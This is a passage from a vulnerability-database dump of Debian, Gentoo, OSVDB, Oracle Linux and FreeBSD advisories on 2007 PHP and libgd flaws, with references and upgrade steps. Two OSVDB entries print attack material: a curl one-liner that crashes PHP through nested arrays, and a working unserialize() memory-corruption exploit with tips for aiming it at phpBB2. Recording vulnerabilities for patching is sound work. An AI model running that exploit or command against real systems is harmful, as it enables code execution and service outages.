676ed67187ddfddb50c8d8779df61571\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_s390.deb\n Size/MD5 checksum: 367886 06b0e25ee20930b4043c5496f2aab0e3\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 221040 d745bb60f8419d7079a2886865f89ca7\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 358368 f4190378385c02f7d6c339969d607e49\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 219262 ba91b74900bf16efc42d805d818d47dd\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 167142 ec45c768f5fc3b0d1994f6302e939e42\n http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3+lenny1_sparc.deb\n Size/MD5 checksum: 360622 00d362606ec08c5b7633e5358a7a805c\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-11-17T21:15:19", "published": "2009-11-17T21:15:19", "id": "DEBIAN:DSA-1936-1:83926", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00259.html", "title": "[SECURITY] [DSA 1936-1] New libgd2 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:22", "bulletinFamily": "unix", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nSeveral vulnerabilities were found in PHP, most of them during the Month Of PHP Bugs (MOPB) by Stefan Esser. The most severe of these vulnerabilities are integer overflows in wbmp.c from the GD library (CVE-2007-1001) and in the substr_compare() PHP 5 function (CVE-2007-1375). Ilia Alshanetsky also reported a buffer overflow in the make_http_soap_request() and in the user_filter_factory_create() functions (CVE-2007-2510, CVE-2007-2511), and Stanislav Malyshev discovered another buffer overflow in the bundled XMLRPC library (CVE-2007-1864). Additionally, the session_regenerate_id() and the array_user_key_compare() functions contain a double-free vulnerability (CVE-2007-1484, CVE-2007-1521). Finally, there exist implementation errors in the Zend engine, in the mb_parse_str(), the unserialize() and the mail() functions and other elements. \n\n### Impact\n\nRemote attackers might be able to exploit these issues in PHP applications making use of the affected functions, potentially resulting in the execution of arbitrary code, Denial of Service, execution of scripted contents in the context of the affected site, security bypass or information leak. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP 5 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.2.2\"\n\nAll PHP 4 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-4.4.7\"", "modified": "2008-03-29T00:00:00", "published": "2007-05-26T00:00:00", "id": "GLSA-200705-19", "href": "https://security.gentoo.org/glsa/200705-19", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a context-dependent attacker to execute arbitrary code. The issue is due to the GD library (libgd) not properly sanitizing user-supplied input to the createwbmp or readwbmp functions in wbmp.c. Using a specially crafted Wireless Bitmap (WBMP) image with a large width or height value, an attacker could trigger an integer overflow and execute arbitrary code.\n## Solution Description\nUpgrade to version 4.4.7, 5.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a context-dependent attacker to execute arbitrary code. The issue is due to the GD library (libgd) not properly sanitizing user-supplied input to the createwbmp or readwbmp functions in wbmp.c. Using a specially crafted Wireless Bitmap (WBMP) image with a large width or height value, an attacker could trigger an integer overflow and execute arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?r1=1.2.4.1&r2=1.2.4.1.8.1\nVendor Specific News/Changelog Entry: http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?revision=1.2.4.1.8.1&view=markup\n[Secunia Advisory ID:25151](https://secuniaresearch.flexerasoftware.com/advisories/25151/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24814](https://secuniaresearch.flexerasoftware.com/advisories/24814/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.slackware.org/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.470053\nOther Advisory URL: http://docs.info.apple.com/article.html?artnum=306172\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0131.html\nISS X-Force ID: 33453\nFrSIRT Advisory: ADV-2007-1269\nFrSIRT Advisory: ADV-2007-2732\n[CVE-2007-1001](https://vulners.com/cve/CVE-2007-1001)\nBugtraq ID: 23357\nBugtraq ID: 25159\n", "modified": "2007-04-10T07:03:45", "published": "2007-04-10T07:03:45", "href": "https://vulners.com/osvdb/OSVDB:34671", "id": "OSVDB:34671", "title": "PHP wbmp.c createwbmp / readwbmp Function WBMP Handling Overflow", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a context-dependent attacker to elevate privileges. The issue is due to the unserializer not properly validating user-supplied input. By passing crafted data, an attacker can overwrite variables pointing to the GLOBALS array or the session data in _SESSION allowing for the execution of arbitrary code.\n## Short Description\nPHP contains a flaw that may allow a context-dependent attacker to elevate privileges. The issue is due to the unserializer not properly validating user-supplied input. By passing crafted data, an attacker can overwrite variables pointing to the GLOBALS array or the session data in _SESSION allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://www.php.net/\n[Secunia Advisory ID:25025](https://secuniaresearch.flexerasoftware.com/advisories/25025/)\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24910](https://secuniaresearch.flexerasoftware.com/advisories/24910/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24941](https://secuniaresearch.flexerasoftware.com/advisories/24941/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0163\nRedHat RHSA: RHSA-2007:0154\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-32-2007.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1282\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nOther Advisory URL: http://docs.info.apple.com/article.html?artnum=306172\nFrSIRT Advisory: ADV-2007-2732\n[CVE-2007-1711](https://vulners.com/cve/CVE-2007-1711)\nBugtraq ID: 23121\nBugtraq ID: 25159\n", "modified": "2007-03-25T02:55:34", "published": "2007-03-25T02:55:34", "href": "https://vulners.com/osvdb/OSVDB:33946", "id": "OSVDB:33946", "title": "PHP session_decode() Double Free Arbitrary Code Execution", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Vulnerability Description\nZend Engine I in PHP 4.4.6 and lower, and Zend Engine II in PHP versions 5.2.1 and lower, contain flaws that may allow a remote denial of service. The issue is due to the application not enforcing sanity checks for the depth of nested arrays which allows a remote user to create very deeply nested array structures. Since the destruction of PHP arrays is done in a recursive way, the attempted destruction of the user's deeply nested array will result in a crash when the stack limit is exhausted, leading to a loss of availability for the service.\n## Technical Description\n$ php -r 'echo \"a\".str_repeat(\"[]\",200000).\"=1&a=0\";' > postdata\n$ curl http://127.0.0.1/phpmyadmin/ -d @postdata\ncurl: (52) Empty reply from server\n## Solution Description\nUpgrade to version 4.4.7, 5.2.2 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Configure your web application firewall to drop high amounts of '[' in variable names.\n## Short Description\nZend Engine I in PHP 4.4.6 and lower, and Zend Engine II in PHP versions 5.2.1 and lower, contain flaws that may allow a remote denial of service. The issue is due to the application not enforcing sanity checks for the depth of nested arrays which allows a remote user to create very deeply nested array structures. Since the destruction of PHP arrays is done in a recursive way, the attempted destruction of the user's deeply nested array will result in a crash when the stack limit is exhausted, leading to a loss of availability for the service.\n## References:\nVendor URL: http://www.php.net/\nVendor URL: http://www.zend.com/products/zend_engine\nSecurity Tracker: 1017771\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24910](https://secuniaresearch.flexerasoftware.com/advisories/24910/)\n[Secunia Advisory ID:24941](https://secuniaresearch.flexerasoftware.com/advisories/24941/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:26048](https://secuniaresearch.flexerasoftware.com/advisories/26048/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Secunia Advisory ID:25816](https://secuniaresearch.flexerasoftware.com/advisories/25816/)\n[Secunia Advisory ID:27864](https://secuniaresearch.flexerasoftware.com/advisories/27864/)\nRedHat RHSA: RHSA-2007:0163\nRedHat RHSA: RHSA-2007:0154\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: https://launchpad.net/bugs/cve/2007-1285\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00006.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-03-2007.html\nOther Advisory URL: http://en.securitylab.ru/nvd/292100.php\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=http--supportnovellcom-techcenter-psdb-3e349d7efffdfecc96ca44f446d1b2c4html&sliceId=&dialogID=38853114&stateId=0%200%2038851668\nOther Advisory URL: http://www.ubuntu.com/usn/usn-549-1\nNews Article: http://www.techworld.com/security/news/index.cfm?newsID=8175\n[CVE-2007-1285](https://vulners.com/cve/CVE-2007-1285)\nBugtraq ID: 22764\n", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:32769", "id": "OSVDB:32769", "title": "PHP Zend Engine Variable Destruction Deep Recursion Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may a context-dependent attacker to elevate privileges. The issue can occur when the unserialize() function is used on an attacker supplied string, which can result in an integer overflow in the refcount variable in _zval_struct through the creation of a large number of references for a specific variable leading to a double destruction of the underlying variable. It is possible that the flaw may allow a remote attacker to execute arbitrary code resulting in a loss of integrity.\n## Technical Description\nThe PHP 4.4.5 release announcement fails to mention that this vulnerability was patched in the 4.4.5 PHP version.\n\nThe exploit below is designed for Linux x86 systems where 0x08064058 is a readable address in the PHP process and will try to execute instruction at 0x99887766, which for arbitrary code execution would need to be replaced with a pointer to your shellcode.\n\n-----------------\nExploit\n-----------------\n<?php\n die(\"REMOVE THIS LINE\");\n $hashtable = str_repeat(\"A\", 39);\n $hashtable[5*4+0]=chr(0x58);\n $hashtable[5*4+1]=chr(0x40);\n $hashtable[5*4+2]=chr(0x06);\n $hashtable[5*4+3]=chr(0x08);\n $hashtable[8*4+0]=chr(0x66);\n $hashtable[8*4+1]=chr(0x77);\n $hashtable[8*4+2]=chr(0x88);\n $hashtable[8*4+3]=chr(0x99);\n $str = 'a:100000:{s:8:\"AAAABBBB\";a:3:{s:12:\"0123456789AA\";a:1:{s:12:\"AAAABBBBCCCC\";i:0;}s:12:\"012345678AAA\";i:0;s:12:\"012345678BAN\";i:0;}';\n for ($i=0; $i<65535; $i++) {\n $str .= 'i:0;R:2;';\n }\n $str .= 's:39:\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\";s:39:\"'.$hashtable.'\";i:0;R:3;';\n unserialize($str);\n?>\n\nTo exploit the PHP application phpBB2, which uses the unserialize() function, you would need to put a similar string into a cookie, working around the size limit of HTTP headers by using many Cookie: headers. Additionally, at the end of every line you would need to place a line terminator s:2:\" and start every following line with \";N; of course with URL encoded ';'\n## Solution Description\nUpgrade to version 4.4.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may a context-dependent attacker to elevate privileges. The issue can occur when the unserialize() function is used on an attacker supplied string, which can result in an integer overflow in the refcount variable in _zval_struct through the creation of a large number of references for a specific variable leading to a double destruction of the underlying variable. It is possible that the flaw may allow a remote attacker to execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific Solution URL: http://www.php.net/downloads.php\nVendor Specific News/Changelog Entry: http://www.php.net/ChangeLog-4.php\n[Vendor Specific Advisory URL](http://www8.itrc.hp.com/service/cki/docDisplay.do?docId=c01056506)\n[Secunia Advisory ID:24089](https://secuniaresearch.flexerasoftware.com/advisories/24089/)\n[Secunia Advisory ID:25025](https://secuniaresearch.flexerasoftware.com/advisories/25025/)\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25850](https://secuniaresearch.flexerasoftware.com/advisories/25850/)\n[Secunia Advisory ID:25423](https://secuniaresearch.flexerasoftware.com/advisories/25423/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:27102](https://secuniaresearch.flexerasoftware.com/advisories/27102/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24910](https://secuniaresearch.flexerasoftware.com/advisories/24910/)\n[Secunia Advisory ID:24419](https://secuniaresearch.flexerasoftware.com/advisories/24419/)\n[Secunia Advisory ID:24941](https://secuniaresearch.flexerasoftware.com/advisories/24941/)\n[Secunia Advisory ID:24606](https://secuniaresearch.flexerasoftware.com/advisories/24606/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\n[Related OSVDB ID: 32770](https://vulners.com/osvdb/OSVDB:32770)\nRedHat RHSA: RHSA-2007:0163\nRedHat RHSA: RHSA-2007:0154\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-04-2007.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-21.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1282\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.trustix.org/errata/2007/0009/\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0363.html\nKeyword: HPSBTU02232,SSRT071429\nKeyword: HPSBMA02215,SSRT071423\nKeyword: HPSBTU02232,SSRT071429,c01086137\nGeneric Exploit URL: http://www.php-security.org/MOPB/code/MOPB-04-2007.php\nFrSIRT Advisory: ADV-2007-0791\n[CVE-2007-1286](https://vulners.com/cve/CVE-2007-1286)\nBugtraq ID: 22765\n", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:32771", "id": "OSVDB:32771", "title": "PHP unserialize() ZVAL Reference Counter Remote Overflow", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24053](https://secuniaresearch.flexerasoftware.com/advisories/24053/)\n[Secunia Advisory ID:24052](https://secuniaresearch.flexerasoftware.com/advisories/24052/)\n[Secunia Advisory ID:24151](https://secuniaresearch.flexerasoftware.com/advisories/24151/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24022](https://secuniaresearch.flexerasoftware.com/advisories/24022/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:25575](https://secuniaresearch.flexerasoftware.com/advisories/25575/)\n[Secunia Advisory ID:23916](https://secuniaresearch.flexerasoftware.com/advisories/23916/)\n[Secunia Advisory ID:24107](https://secuniaresearch.flexerasoftware.com/advisories/24107/)\n[Secunia Advisory ID:24143](https://secuniaresearch.flexerasoftware.com/advisories/24143/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=224607\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:035\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:036\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-February/000145.html\nOther Advisory URL: http://www.trustix.org/errata/2007/0007/\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:038\nOther Advisory URL: http://fedoranews.org/cms/node/2631\nOther Advisory URL: http://www.ubuntu.com/usn/usn-473-1\nFrSIRT Advisory: ADV-2007-0400\n[CVE-2007-0455](https://vulners.com/cve/CVE-2007-0455)\nBugtraq ID: 22289\n", "modified": "2007-01-29T10:48:48", "published": "2007-01-29T10:48:48", "href": "https://vulners.com/osvdb/OSVDB:33008", "id": "OSVDB:33008", "title": "GD Graphics Library gdImageStringFTEx() Function Crafted JIS Encoded Font Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to bypass security restrictions. The issue is due to the mb_parse_str function setting the internal register_globals flag but not properly disabling it in some cases when a script terminates. This may allow an attacker to execute a PHP script with register_globals functionality.\n## Solution Description\nUpgrade to version 4.4.7, 5.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to bypass security restrictions. The issue is due to the mb_parse_str function setting the internal register_globals flag but not properly disabling it in some cases when a script terminates. This may allow an attacker to execute a PHP script with register_globals functionality.\n## References:\nVendor URL: http://www.php.net/\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory ID:25057](https://secuniaresearch.flexerasoftware.com/advisories/25057/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\n[Secunia Advisory ID:24945](https://secuniaresearch.flexerasoftware.com/advisories/24945/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000176.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-26-2007.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.ubuntu.com/usn/usn-455-1\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nOther Advisory URL: http://docs.info.apple.com/article.html?artnum=306172\n[CVE-2007-1583](https://vulners.com/cve/CVE-2007-1583)\nBugtraq ID: 23016\n", "modified": "2007-03-18T10:29:24", "published": "2007-03-18T10:29:24", "href": "https://vulners.com/osvdb/OSVDB:33940", "id": "OSVDB:33940", "title": "PHP mb_parse_str() register_globals Functionality Invocation", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to manipulate mail functionality. The issue is due to mail function not properly sanitizing user-supplied input. By supplying CRLF (newline) characters, an attacker can inject arbitrary e-mail headers which may allow them to send mail to arbitrary hosts by supplying a control character after a Subject: or TO: parameter.\n## Solution Description\nUpgrade to version 5.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to manipulate mail functionality. The issue is due to mail function not properly sanitizing user-supplied input. By supplying CRLF (newline) characters, an attacker can inject arbitrary e-mail headers which may allow them to send mail to arbitrary hosts by supplying a control character after a Subject: or TO: parameter.\n## References:\nVendor URL: http://www.php.net/\n[Secunia Advisory ID:25025](https://secuniaresearch.flexerasoftware.com/advisories/25025/)\n[Secunia Advisory ID:25062](https://secuniaresearch.flexerasoftware.com/advisories/25062/)\n[Secunia Advisory ID:25056](https://secuniaresearch.flexerasoftware.com/advisories/25056/)\n[Secunia Advisory ID:25192](https://secuniaresearch.flexerasoftware.com/advisories/25192/)\n[Secunia Advisory ID:24924](https://secuniaresearch.flexerasoftware.com/advisories/24924/)\n[Secunia Advisory ID:26235](https://secuniaresearch.flexerasoftware.com/advisories/26235/)\n[Secunia Advisory ID:24965](https://secuniaresearch.flexerasoftware.com/advisories/24965/)\n[Secunia Advisory ID:24909](https://secuniaresearch.flexerasoftware.com/advisories/24909/)\n[Secunia Advisory ID:25057](https://secuniaresearch.flexerasoftware.com/advisories/25057/)\n[Secunia Advisory ID:25445](https://secuniaresearch.flexerasoftware.com/advisories/25445/)\nRedHat RHSA: RHSA-2007:0153\nRedHat RHSA: RHSA-2007:0155\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:089\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-May/0007.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070501-01-P.asc\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1282\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-33-2007.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200705-19.xml\nOther Advisory URL: http://www.php-security.org/MOPB/MOPB-34-2007.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-455-1\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1283\nOther Advisory URL: http://docs.info.apple.com/article.html?artnum=306172\n[CVE-2007-1718](https://vulners.com/cve/CVE-2007-1718)\n[CVE-2007-1717](https://vulners.com/cve/CVE-2007-1717)\nBugtraq ID: 23146\nBugtraq ID: 23145\n", "modified": "2007-03-26T06:57:38", "published": "2007-03-26T06:57:38", "href": "https://vulners.com/osvdb/OSVDB:33948", "id": "OSVDB:33948", "title": "PHP mail() Function Arbitrary Mail Sending", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:37:54", "bulletinFamily": "unix", "description": " [5.1.6-12.el5]\n - add security fix for CVE-2007-1864, SOAP redirect handling issue,\n FTP CRLF injection issue (#235016)\n \n [5.1.6-11.el5]\n - add security fix for CVE-2007-1718 (#235016)\n \n [5.1.6-9.el5]\n - add security fix for CVE-2007-1583 (#235016)\n - add security fixes for CVE-2007-0455, CVE-2007-1001 (#235036)\n \n [5.1.6-7.el5]\n - add security fix for CVE-2007-1285 (#231597)\n \n [5.1.6-6.el5]\n - add security fixes for: CVE-2007-0906, CVE-2007-0907,\n CVE-2007-0908, CVE-2007-0909, CVE-2007-0910, CVE-2007-0988 (#229013) ", "modified": "2007-06-26T00:00:00", "published": "2007-06-26T00:00:00", "id": "ELSA-2007-0348", "href": "http://linux.oracle.com/errata/ELSA-2007-0348.html", "title": "Important: php security update ", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:41", "bulletinFamily": "unix", "description": "\nThe PHP development team reports:\n\nSecurity Enhancements and Fixes in PHP 5.2.2 and PHP\n\t 4.4.7:\n\nFixed CVE-2007-1001, GD wbmp used with invalid image\n\t size\nFixed asciiz byte truncation inside mail()\nFixed a bug in mb_parse_str() that can be used to\n\t activate register_globals\nFixed unallocated memory access/double free in in\n\t array_user_key_compare()\nFixed a double free inside session_regenerate_id()\nAdded missing open_basedir & safe_mode checks to zip://\n\t and bzip:// wrappers.\nLimit nesting level of input variables with\n\t max_input_nesting_level as fix for.\nFixed CRLF injection inside ftp_putcmd().\nFixed a possible super-global overwrite inside\n\t import_request_variables().\nFixed a remotely trigger-able buffer overflow inside\n\t bundled libxmlrpc library.\n\nSecurity Enhancements and Fixes in PHP 5.2.2 only:\n\nFixed a header injection via Subject and To parameters\n\t to the mail() function\nFixed wrong length calculation in unserialize S\n\t type.\nFixed substr_compare and substr_count information\n\t leak.\nFixed a remotely trigger-able buffer overflow inside\n\t make_http_soap_request().\nFixed a buffer overflow inside\n\t user_filter_factory_create().\n\nSecurity Enhancements and Fixes in PHP 4.4.7 only:\n\nXSS in phpinfo()\n\n\n", "modified": "2014-04-01T00:00:00", "published": "2007-05-03T00:00:00", "id": "F5E52BF5-FC77-11DB-8163-000E0C2E438A", "href": 